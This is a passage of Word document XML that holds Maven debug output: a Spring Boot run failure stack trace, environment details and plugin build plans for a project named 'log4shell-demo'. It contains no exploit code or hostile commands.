    <w:p w14:paraId="13E302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org.springframework.boot.maven.AbstractRunMojo.run (AbstractRunMojo.java:251)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D772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org.springframework.boot.maven.AbstractRunMojo.execute (AbstractRunMojo.java:223)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123E76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org.apache.maven.plugin.DefaultBuildPluginManager.executeMojo (DefaultBuildPluginManager.java:137)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014750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(MojoExecutor.java:210)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D87C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(MojoExecutor.java:156)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373543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(MojoExecutor.java:148)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11736A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org.apache.maven.lifecycle.internal.LifecycleModuleBuilder.buildProject (LifecycleModuleBuilder.java:117)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13BD4CC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org.apache.maven.lifecycle.internal.LifecycleModuleBuilder.buildProject (LifecycleModuleBuilder.java:81)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6036BD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org.apache.maven.lifecycle.internal.builder.singlethreaded.SingleThreadedBuilder.build (SingleThreadedBuilder.java:56)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1CC0C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org.apache.maven.lifecycle.internal.LifecycleStarter.execute (LifecycleStarter.java:128)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1BB76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org.apache.maven.DefaultMaven.doExecute (DefaultMaven.java:305)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B57DD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org.apache.maven.DefaultMaven.doExecute (DefaultMaven.java:192)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64EADD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org.apache.maven.DefaultMaven.execute (DefaultMaven.java:105)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213DFE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org.apache.maven.cli.MavenCli.execute (MavenCli.java:972)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6269EA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org.apache.maven.cli.MavenCli.doMain (MavenCli.java:293)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144B46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org.apache.maven.cli.MavenCli.main (MavenCli.java:196)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DE71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jdk.internal.reflect.NativeMethodAccessorImpl.invoke0 (Native Method)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EBECD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jdk.internal.reflect.NativeMethodAccessorImpl.invoke (NativeMethodAccessorImpl.java:77)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DDD5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jdk.internal.reflect.DelegatingMethodAccessorImpl.invoke (DelegatingMethodAccessorImpl.java:43)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315E20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java.lang.reflect.Method.invoke (Method.java:569)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030F1B9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org.codehaus.plexus.classworlds.launcher.Launcher.launchEnhanced (Launcher.java:282)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A149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org.codehaus.plexus.classworlds.launcher.Launcher.launch (Launcher.java:225)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479F5C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org.codehaus.plexus.classworlds.launcher.Launcher.mainWithExitCode (Launcher.java:406)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B52D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org.codehaus.plexus.classworlds.launcher.Launcher.main (Launcher.java:347)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CAAF05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[ERROR]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D2C5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Re-run Maven using the -X switch to enable full debug logging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74DF15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2D4351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For more information about the errors and possible solutions, please read the following articles:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA3F8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[Help 1] http://cwiki.apache.org/confluence/display/MAVEN/MojoExecutionException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8CF0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spring-boot:run -X</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF9B7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Apache Maven 3.8.4 (Red Hat 3.8.4-3.amzn2023.0.5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F9BD0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Maven home: /usr/share/maven</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D53D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Java version: 17.0.15, vendor: Amazon.com Inc., runtime: /usr/lib/jvm/java-17-amazon-corretto.x86_64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA7817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Default locale: en, platform encoding: UTF-8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711FCA3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OS name: "linux", version: "6.1.134-152.225.amzn2023.x86_64", arch: "amd64", family: "unix"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9D92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Created new class realm maven.api</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16FA95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Importing foreign packages into class realm maven.api</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263821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javax.annotation.* &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526178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javax.annotation.security.* &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004B8E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javax.inject.* &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB1C9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 &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5892DA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org.apache.maven.artifact &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C4E63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org.apache.maven.classrealm &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C19C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org.apache.maven.cli &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8EB1D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org.apache.maven.configuration &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434A67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org.apache.maven.exception &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186C533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org.apache.maven.execution &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC07B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org.apache.maven.execution.scope &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093CC1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org.apache.maven.lifecycle &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE7157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org.apache.maven.model &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2EE3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org.apache.maven.monitor &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E8CF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org.apache.maven.plugin &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795B4A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org.apache.maven.profiles &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4FE1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Imported: org.apache.maven.project &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19796AD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org.apache.maven.reporting &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6204A0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org.apache.maven.repository &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667B47C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org.apache.maven.rtinfo &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227CF8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org.apache.maven.settings &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4D9F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org.apache.maven.toolchain &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFEE7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org.apache.maven.usability &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="010AB7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org.apache.maven.wagon.* &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1340F3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org.apache.maven.wagon.authentication &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD3BEE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org.apache.maven.wagon.authorization &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4E909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org.apache.maven.wagon.events &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040D167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org.apache.maven.wagon.observers &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0524B78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org.apache.maven.wagon.proxy &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA111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org.apache.maven.wagon.repository &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A229D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org.apache.maven.wagon.resource &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF5BE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org.codehaus.classworlds &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8954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 &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217B0F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org.codehaus.plexus.classworlds &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09176E5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org.codehaus.plexus.component &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F118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org.codehaus.plexus.configuration &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5632F0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org.codehaus.plexus.container &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B31D41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org.codehaus.plexus.context &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A224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org.codehaus.plexus.lifecycle &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04512BF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org.codehaus.plexus.logging &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391016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org.codehaus.plexus.personality &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39340F3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org.codehaus.plexus.util.xml.Xpp3Dom &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3988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org.codehaus.plexus.util.xml.pull.XmlPullParser &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434015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org.codehaus.plexus.util.xml.pull.XmlPullParserException &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8C65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org.codehaus.plexus.util.xml.pull.XmlSerializer &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0113C0E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Imported: org.eclipse.aether.* &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDB3F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org.eclipse.aether.artifact &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F266B5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org.eclipse.aether.collection &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF10D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org.eclipse.aether.deployment &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DAC1E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org.eclipse.aether.graph &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2D806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org.eclipse.aether.impl &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA343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org.eclipse.aether.installation &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057020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org.eclipse.aether.internal.impl &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39ABE6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org.eclipse.aether.metadata &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12AA7AD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org.eclipse.aether.repository &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3137FE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org.eclipse.aether.resolution &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3D61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org.eclipse.aether.spi &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69BF7FA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org.eclipse.aether.transfer &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729172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org.eclipse.aether.version &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EFE3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org.fusesource.jansi.* &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFFF1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org.slf4j.* &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDF6A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org.slf4j.event.* &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C03A0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org.slf4j.helpers.* &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12240B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org.slf4j.spi.* &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD645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Populating class realm maven.api</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362EC2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Error stacktraces are turned on.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AEFE0F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Message scheme: color</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F95FC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Message styles: debug info warning error success failure strong mojo project</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58170B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Reading global settings from /usr/share/maven/conf/settings.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071520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Reading user settings from /home/ec2-user/.m2/settings.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509670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Reading global toolchains from /usr/share/maven/conf/toolchains.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366D20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Reading user toolchains from /home/ec2-user/.m2/toolchains.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1390E3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local repository at /home/ec2-user/.m2/repository</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3880A65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manager EnhancedLocalRepositoryManager with priority 10.0 for /home/ec2-user/.m2/repository</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7B04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 Scanning for projects...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6EE78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Extension realms for project com.example:log4shell-demo:jar:0.0.1-SNAPSHOT: (none)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B493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Looking up lifecycle mappings for packaging jar from ClassRealm[plexus.core, parent: null]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7E6E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Extension realms for project org.springframework.boot:spring-boot-starter-parent:pom:2.5.5: (none)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5F1F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Looking up lifecycle mappings for packaging pom from ClassRealm[plexus.core, parent: null]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085A34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Extension realms for project org.springframework.boot:spring-boot-dependencies:pom:2.5.5: (none)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A86F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Looking up lifecycle mappings for packaging pom from ClassRealm[plexus.core, parent: null]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D597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Resolving plugin prefix spring-boot from [org.apache.maven.plugins, org.codehaus.mojo]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143485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Resolved plugin prefix spring-boot to org.springframework.boot:spring-boot-maven-plugin from POM com.example:log4shell-demo:jar:0.0.1-SNAPSHOT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE6C9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REACTOR BUILD PLAN ================================================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CDE4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Project: com.example:log4shell-demo:jar:0.0.1-SNAPSHOT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD3803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Tasks:   [spring-boot:run]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEA489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Style:   Regular</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF0CD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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0E94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635D1C6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 com.example:log4shell-demo &gt;---------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061682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log4shell-demo 0.0.1-SNAPSHOT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288D5A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jar ]---------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C9826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Resolving plugin prefix spring-boot from [org.apache.maven.plugins, org.codehaus.mojo]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9BC41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Resolved plugin prefix spring-boot to org.springframework.boot:spring-boot-maven-plugin from POM com.example:log4shell-demo:jar:0.0.1-SNAPSHOT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BF76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default -&gt; [validate, initialize, generate-sources, process-sources, generate-resources, process-resources, compile, process-classes, generate-test-sources, process-test-sources, generate-test-resources, process-test-resources, test-compile, process-test-classes, test, prepare-package, package, pre-integration-test, integration-test, post-integration-test, verify, install, deploy]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4034269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clean -&gt; [pre-clean, clean, post-clean]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBA26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site -&gt; [pre-site, site, post-site, site-deploy]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F68E7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default -&gt; [validate, initialize, generate-sources, process-sources, generate-resources, process-resources, compile, process-classes, generate-test-sources, process-test-sources, generate-test-resources, process-test-resources, test-compile, process-test-classes, test, prepare-package, package, pre-integration-test, integration-test, post-integration-test, verify, install, deploy]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167D3A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Lifecycle clean -&gt; [pre-clean, clean, post-clean]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D44AF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site -&gt; [pre-site, site, post-site, site-deploy]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1428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PROJECT BUILD PLAN ================================================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33751A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Project:       com.example:log4shell-demo:0.0.1-SNAPSHOT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8D0B2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Dependencies (collect): []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F0D83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Dependencies (resolve): [test]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A481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Repositories (dependencies): [central (https://repo.maven.apache.org/maven2, default, releases)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370A5B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Repositories (plugins)     : [central (https://repo.maven.apache.org/maven2, default, releases)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2371C5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init fork of com.example:log4shell-demo:0.0.1-SNAPSHOT for org.springframework.boot:spring-boot-maven-plugin:2.5.5:run (default-cli) ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC5129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Dependencies (collect): []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4966ED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Dependencies (resolve): [compile, test]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB69A2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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544540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Goal:          org.apache.maven.plugins:maven-resources-plugin:3.2.0:resources (default-resources)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC0E49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Style:         Regular</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260FA4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Configuration: &lt;?xml version="1.0" encoding="UTF-8"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412186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3E38CD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&lt;addDefaultExcludes default-value="true"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2440DB9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&lt;buildFilters default-value="${project.build.filters}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6734BE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&lt;delimiters&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8A248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&lt;delimiter&gt;@&lt;/delimiter&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A85A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&lt;/delimiters&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B281A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&lt;encoding default-value="${project.build.sourceEncoding}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2525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&lt;escapeWindowsPaths default-value="true"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0E63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&lt;fileNameFiltering default-value="false"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FA60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&lt;includeEmptyDirs default-value="false"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5DC79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&lt;outputDirectory default-value="${project.build.outputDirectory}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BDD33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&lt;overwrite default-value="false"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5D31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&lt;project default-value="${project}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144DA97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&lt;propertiesEncoding&gt;UTF-8&lt;/propertiesEncoding&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026A6E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&lt;resources default-value="${project.resources}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482E65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&lt;session default-value="${session}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EEF1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 default-value="false"&gt;${maven.resources.skip}&lt;/skip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C6481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&lt;supportMultiLineFiltering default-value="false"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC736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&lt;useBuildFilters default-value="true"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617FB8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&lt;useDefaultDelimiters default-value="true"&gt;false&lt;/useDefaultDelimiters&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCE77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3AD7E4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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076B65B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Goal:          org.apache.maven.plugins:maven-compiler-plugin:3.8.1:compile (default-compile)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E28B8F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Style:         Regular</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4C1B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Configuration: &lt;?xml version="1.0" encoding="UTF-8"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D9BC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492DF2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&lt;basedir default-value="${basedir}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C297D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&lt;buildDirectory default-value="${project.build.directory}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E48865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&lt;compilePath default-value="${project.compileClasspathElements}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F55E8D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&lt;compileSourceRoots default-value="${project.compileSourceRoots}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD30E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&lt;compilerId default-value="javac"&gt;${maven.compiler.compilerId}&lt;/compilerId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CFB3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&lt;compilerReuseStrategy default-value="${reuseCreated}"&gt;${maven.compiler.compilerReuseStrategy}&lt;/compilerReuseStrategy&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2D37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&lt;compilerVersion&gt;${maven.compiler.compilerVersion}&lt;/compilerVersion&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A534C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&lt;debug default-value="true"&gt;${maven.compiler.debug}&lt;/debug&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E68E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&lt;debuglevel&gt;${maven.compiler.debuglevel}&lt;/debuglevel&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27EF3D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&lt;encoding default-value="${project.build.sourceEncoding}"&gt;${encoding}&lt;/encoding&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200BC4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&lt;executable&gt;${maven.compiler.executable}&lt;/executable&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6D8CC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&lt;failOnError default-value="true"&gt;${maven.compiler.failOnError}&lt;/failOnError&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBF03F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&lt;failOnWarning default-value="false"&gt;${maven.compiler.failOnWarning}&lt;/failOnWarning&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A076C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&lt;forceJavacCompilerUse default-value="false"&gt;${maven.compiler.forceJavacCompilerUse}&lt;/forceJavacCompilerUse&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D481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&lt;fork default-value="false"&gt;${maven.compiler.fork}&lt;/fork&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388560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&lt;generatedSourcesDirectory default-value="${project.build.directory}/generated-sources/annotations"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCB81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&lt;maxmem&gt;${maven.compiler.maxmem}&lt;/maxmem&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D40430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&lt;meminitial&gt;${maven.compiler.meminitial}&lt;/meminitial&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5559745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&lt;mojoExecution default-value="${mojoExecution}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D0D1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&lt;optimize default-value="false"&gt;${maven.compiler.optimize}&lt;/optimize&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D078E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&lt;outputDirectory default-value="${project.build.outputDirectory}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060391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&lt;parameters default-value="false"&gt;true&lt;/parameters&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52007F3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&lt;project default-value="${project}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781E35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&lt;projectArtifact default-value="${project.artifact}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A03EA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&lt;release&gt;${maven.compiler.release}&lt;/release&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435073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&lt;session default-value="${session}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006AF8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&lt;showDeprecation default-value="false"&gt;${maven.compiler.showDeprecation}&lt;/showDeprecation&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DE20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&lt;showWarnings default-value="false"&gt;${maven.compiler.showWarnings}&lt;/showWarnings&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8929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&lt;skipMain&gt;${maven.main.skip}&lt;/skipMain&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1CF7B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&lt;skipMultiThreadWarning default-value="false"&gt;${maven.compiler.skipMultiThreadWarning}&lt;/skipMultiThreadWarning&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0556E7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&lt;source default-value="1.6"&gt;${maven.compiler.source}&lt;/source&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F0FF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&lt;staleMillis default-value="0"&gt;${lastModGranularityMs}&lt;/staleMillis&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4581C9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&lt;target default-value="1.6"&gt;${maven.compiler.target}&lt;/target&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2BC6C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&lt;useIncrementalCompilation default-value="true"&gt;${maven.compiler.useIncrementalCompilation}&lt;/useIncrementalCompilation&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D75F0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&lt;verbose default-value="false"&gt;${maven.compiler.verbose}&lt;/verbose&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609367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11E9C3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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5009478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Goal:          org.apache.maven.plugins:maven-resources-plugin:3.2.0:testResources (default-testResources)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F098E1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Style:         Regular</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9BBF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Configuration: &lt;?xml version="1.0" encoding="UTF-8"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E217E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66070D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&lt;addDefaultExcludes default-value="true"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A4353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&lt;buildFilters default-value="${project.build.filters}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319A15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&lt;delimiters&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2A96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&lt;delimiter&gt;@&lt;/delimiter&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE5D0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&lt;/delimiters&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7C20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&lt;encoding default-value="${project.build.sourceEncoding}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0161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&lt;escapeWindowsPaths default-value="true"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0D3A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&lt;fileNameFiltering default-value="false"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499129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&lt;includeEmptyDirs default-value="false"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F8FD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&lt;outputDirectory default-value="${project.build.testOutputDirectory}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2DC2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&lt;overwrite default-value="false"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3599A23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&lt;project default-value="${project}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F1744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&lt;propertiesEncoding&gt;UTF-8&lt;/propertiesEncoding&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070655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&lt;resources default-value="${project.testResources}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1916986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&lt;session default-value="${session}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E175B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 default-value="false"&gt;${maven.test.skip}&lt;/skip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6DE6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&lt;supportMultiLineFiltering default-value="false"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093310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&lt;useBuildFilters default-value="true"/&gt;</w:t>
